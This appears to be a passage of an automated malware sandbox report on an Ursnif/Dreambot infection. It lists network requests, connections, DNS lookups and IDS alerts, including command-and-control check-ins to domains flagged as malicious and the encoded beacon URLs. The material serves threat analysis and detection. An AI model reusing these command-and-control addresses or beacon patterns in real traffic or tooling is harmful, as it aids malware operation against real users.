2828 IEXPLORE.EXE GET 200 77.88.21.119:443 https://mc.yandex.ru/watch/34150835/1?wmode=7&page-url=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&charset=utf-8&browser-info=ti%3A10%3Aj%3A1%3Ans%3A1563461475627%3As%3A1280x720x24%3Ask%3A1%3Af%3A27.0.0.187%3Afpr%3A411595655001%3Acn%3A1%3Aw%3A776x521%3Ai%3A20190718145119%3Aet%3A1563461480%3Aen%3Autf-8%3Ac%3A1%3Ala%3Aen-us%3Awh%3A1%3Apv%3A1%3Als%3A931635438724%3Arqn%3A1%3Arn%3A24857546%3Ahid%3A711976697%3Ads%3A0%2C0%2C0%2C111%2C1%2C0%2C0%2C2631%2C0%2C%2C%2C%2C2632%3Agdpr%3A14%3Av%3A1609%3Arqnl%3A1%3Ast%3A1563461480%3Au%3A1563461480675499970%3At%3APage%20not%20found RU
text
whitelisted
2828 IEXPLORE.EXE GET 200 147.75.83.123:443 https://vars.hotjar.com/box-90f3a29ef7448451db5af955688970d7.html US
html
whitelisted
2828 IEXPLORE.EXE POST 200 172.217.21.206:443 https://ampcid.google.ie/v1/publisher:getClientId?key=AIzaSyA65lEHUEizIsNtlbNo-l2K18dT680nsaM US
text
text
whitelisted
2828 IEXPLORE.EXE GET 200 216.58.208.46:443 https://www.google-analytics.com/gtm/js?id=GTM-58JT2DK&t=gtm16&cid=1235668083.1563461481&aip=true US
text
whitelisted
2828 IEXPLORE.EXE GET 200 104.108.59.193:443 https://t.av.st/api/rum/v1/?q=%7B%22domain%22%3A%22www.avast.com%22%2C%22pageId%22%3A%22C5j.avi%22%2C%22contentId%22%3A%22en-ww%20%7C%20error-page.php%22%2C%22locale%22%3A%22en-ww%22%2C%22browser%22%3A%7B%22name%22%3A%22InternetExplorer%22%2C%22ver%22%3A%2211.0%22%2C%22lang%22%3A%22en-us%22%7D%2C%22trackHit%22%3Atrue%2C%22performance%22%3A%7B%22unloadTime%22%3A0%2C%22redirectTime%22%3A0%2C%22domainLookupTime%22%3A0%2C%22connectTime%22%3A0%2C%22requestTime%22%3A0%2C%22responseTime%22%3A111%2C%22dom%22%3A%7B%22interactiveTime%22%3A2631%2C%22loadEventStartTime%22%3A0%2C%22contentLoadedEventTime%22%3A0%2C%22resourceLodedTime%22%3A2328%7D%2C%22domTime%22%3A4959%2C%22loadEventTime%22%3A43%2C%22fullTime%22%3A5003%7D%7D NL
image
unknown
2828 IEXPLORE.EXE GET 200 216.58.208.46:443 https://www.google-analytics.com/plugins/ua/ec.js US
text
whitelisted
2828 IEXPLORE.EXE GET 302 216.58.208.46:443 https://www.google-analytics.com/r/collect?v=1&_v=j77&aip=1&a=1769986088&t=pageview&_s=1&dl=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&dp=%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&ul=en-us&de=utf-8&dt=Page%20not%20found&sd=24-bit&sr=1280x720&vp=776x521&je=1&fl=27.0%20r0&_u=aGDAAUQKQAQC~&jid=1064074141&gjid=1950763104&cid=1235668083.1563461481&tid=UA-58120669-2&_gid=1714463231.1563461481&_r=1&gtm=2wg7a0PZ48F8&cd12=en-ww&cd14=en-ww%20%7C%20error-page.php&cd28=avast.com&cd29=1&cd34=https%3A%2F%2Fwww.avast.com%2Fimages%2FXwESZsNY4Gk6WaVeonp%2FFaEKtuDMEUOAVncZoElyUg%2FmU5vD4UBW5RIM%2FM6hwqzoj%2FJOtpRom3aWw1vBxNmbCY82J%2Fj8acWNZCGz%2FwMzfuFVWEVFo_2BkH%2F_2B71pxiWPEP%2FfZi63JkNCXx%2FPK1wJFwssWujstzW%2FC5j.avi&cd41=1235668083.1563461481&cd42=N%2FA&cd44=Mozilla%2F5.0%20(Windows%20NT%206.1%3B%20WOW64%3B%20Trident%2F7.0%3B%20SLCC2%3B%20.NET%20CLR%202.0.50727%3B%20.NET%20CLR%203.5.30729%3B%20.NET%20CLR%203.0.30729%3B%20Media%20Center%20PC%206.0%3B%20.NET4.0C%3B%20.NET4.0E%3B%20rv%3A11.0)%20like%20Gecko&cd45=Coordinated%20Universal%20Time&cd46=Thu%20Jul%2018%202019%2014%3A51%3A21%20GMT%2B0000%20(Coordinated%20Universal%20Time)&cd47=14&cd74=61fa02ff9c7334be22cd63fe9fa9b72e&cd78=GTM-PZ48F8_329_false&cd99=999_a3g%20%7C%7C%20source%3D(direct)%7Cmedium%3D(none)%7Ccampaign%3D(not%20set)%7CsegmentCode%3Da&z=301848108 US
html
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/i-v11/icons-sprite-nav-orange.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/colorbox/colorbox-arrows-v9.png unknown
image
whitelisted
2828 IEXPLORE.EXE GET 200 2.18.235.38:443 https://static3.avast.com/10001074/web/i/clearbox-loading.gif unknown
image
whitelisted
2640 IEXPLORE.EXE GET 200 85.143.217.238:80 http://nrosalynh.xyz/images/M_2BvnIlP0d2U3elGCGbOEx/i5MXlIG2hL/zb2SWRrmQJzJLVCW_/2FrabLvp0fam/pDXEmtsS1lI/_2FdtQFJI_2BmJ/S0rvUwoZS7iadtheY2Kou/kwGUuQV_2B02r_2F/92dPPzOf7ngtNor/HswiDv9w1bj30/B9mJBXtf8/H.avi RU
––
––
malicious
1924 iexplore.exe GET 200 85.143.217.238:80 http://nrosalynh.xyz/favicon.ico RU
image
malicious

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID Process IP ASN CN Reputation
2080 powershell.exe 147.78.66.46:80 –– suspicious
2080 powershell.exe 109.196.164.79:80 –– suspicious
2476 IEXPLORE.EXE 40.113.200.201:80 Microsoft Corporation US malicious
2476 IEXPLORE.EXE 2.21.41.70:443 GTT Communications Inc. FR suspicious
2476 IEXPLORE.EXE 2.16.186.32:443 Akamai International B.V. –– whitelisted
2476 IEXPLORE.EXE 152.199.19.160:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2476 IEXPLORE.EXE 2.19.39.63:443 Akamai International B.V. –– unknown
2476 IEXPLORE.EXE 2.18.233.62:443 Akamai International B.V. –– whitelisted
2476 IEXPLORE.EXE 2.16.186.27:443 Akamai International B.V. –– whitelisted
2448 iexplore.exe 204.79.197.200:443 Microsoft Corporation US whitelisted
2476 IEXPLORE.EXE 2.18.232.244:443 Akamai International B.V. –– unknown
2448 iexplore.exe 152.199.19.161:443 MCI Communications Services, Inc. d/b/a Verizon Business US whitelisted
2828 IEXPLORE.EXE 5.62.40.96:80 AVAST Software s.r.o. DE malicious
2828 IEXPLORE.EXE 104.108.46.190:443 Akamai Technologies, Inc. NL whitelisted
2828 IEXPLORE.EXE 2.18.235.38:443 Akamai International B.V. –– whitelisted
2828 IEXPLORE.EXE 216.58.210.8:443 Google Inc. US whitelisted
2828 IEXPLORE.EXE 159.122.87.148:443 SoftLayer Technologies Inc. DE unknown
2828 IEXPLORE.EXE 147.75.83.123:443 Packet Host, Inc. US unknown
2828 IEXPLORE.EXE 216.58.208.46:443 Google Inc. US whitelisted
2828 IEXPLORE.EXE 77.88.21.119:443 YANDEX LLC RU whitelisted
2828 IEXPLORE.EXE 147.75.32.75:443 Packet Host, Inc. US unknown
1440 iexplore.exe 204.79.197.200:443 Microsoft Corporation US whitelisted
2828 IEXPLORE.EXE 172.217.16.142:443 Google Inc. US whitelisted
2828 IEXPLORE.EXE 172.217.21.206:443 Google Inc. US whitelisted
2828 IEXPLORE.EXE 104.108.59.193:443 Akamai Technologies, Inc. NL unknown
2828 IEXPLORE.EXE 66.102.1.155:443 Google Inc. US whitelisted
2640 IEXPLORE.EXE 85.143.217.238:80 Trader soft LLC RU malicious
1924 iexplore.exe 85.143.217.238:80 Trader soft LLC RU malicious

DNS requests

Domain IP Reputation
dx019xsl1pace.xyz 147.78.66.46
malicious
microsoft.com 40.113.200.201
104.215.148.63
13.77.161.179
40.76.4.15
40.112.72.205
whitelisted
www.microsoft.com 2.21.41.70
whitelisted
assets.onestore.ms 2.19.39.63
whitelisted
statics-uhf-wus.akamaized.net 2.16.186.32
2.16.186.11
whitelisted
c.s-microsoft.com 2.18.233.62
whitelisted
ajax.aspnetcdn.com 152.199.19.160
whitelisted
img-prod-cms-rt-microsoft-com.akamaized.net 2.16.186.27
2.16.186.40
whitelisted
api.bing.com 13.107.5.80
whitelisted
www.bing.com 204.79.197.200
13.107.21.200
whitelisted
uhf.microsoft.com 2.18.232.244
whitelisted
iecvlist.microsoft.com 152.199.19.161
whitelisted
r20swj13mr.microsoft.com 152.199.19.161
whitelisted
avast.com 5.62.40.96
5.62.42.77
5.62.48.97
whitelisted
www.avast.com 104.108.46.190
whitelisted
static3.avast.com 2.18.235.38
whitelisted
www.googletagmanager.com 216.58.210.8
whitelisted
static.avast.com 2.18.235.38
whitelisted
dev.visualwebsiteoptimizer.com 159.122.87.148
159.122.87.153
whitelisted
www.google-analytics.com 216.58.208.46
whitelisted
static.hotjar.com 147.75.83.123
147.75.83.163
147.75.204.174
147.75.32.75
147.75.204.150
147.75.204.222
147.75.84.99
147.75.102.227
whitelisted
mc.yandex.ru 77.88.21.119
87.250.250.119
87.250.251.119
93.158.134.119
whitelisted
script.hotjar.com 147.75.32.75
147.75.83.125
147.75.83.163
147.75.204.222
147.75.84.99
147.75.204.150
147.75.204.174
147.75.102.227
whitelisted
ampcid.google.com 172.217.16.142
whitelisted
vars.hotjar.com 147.75.83.123
147.75.83.163
147.75.84.99
147.75.204.210
147.75.204.150
147.75.204.174
147.75.32.75
147.75.204.222
whitelisted
ampcid.google.ie 172.217.21.206
whitelisted
t.av.st 104.108.59.193
unknown
stats.g.doubleclick.net 66.102.1.155
66.102.1.154
66.102.1.156
66.102.1.157
whitelisted
nrosalynh.xyz 85.143.217.238
malicious

Threats

PID Process Class Message
2080 powershell.exe A Network Trojan was detected MALWARE [PTsecurity] MalDoc Requesting Ursnif Payload
2080 powershell.exe Potentially Bad Traffic AV INFO HTTP Request to a *.xyz domain
2476 IEXPLORE.EXE A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2828 IEXPLORE.EXE A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2640 IEXPLORE.EXE A Network Trojan was detected MALWARE [PTsecurity] W32.Dreambot HTTP GET Check-in
2640 IEXPLORE.EXE Potentially Bad Traffic AV INFO HTTP Request to a *.xyz domain
1924 iexplore.exe Potentially Bad Traffic AV INFO HTTP Request to a *.xyz domain

5 ETPRO signatures available at the full report

Debug output strings

No debug info.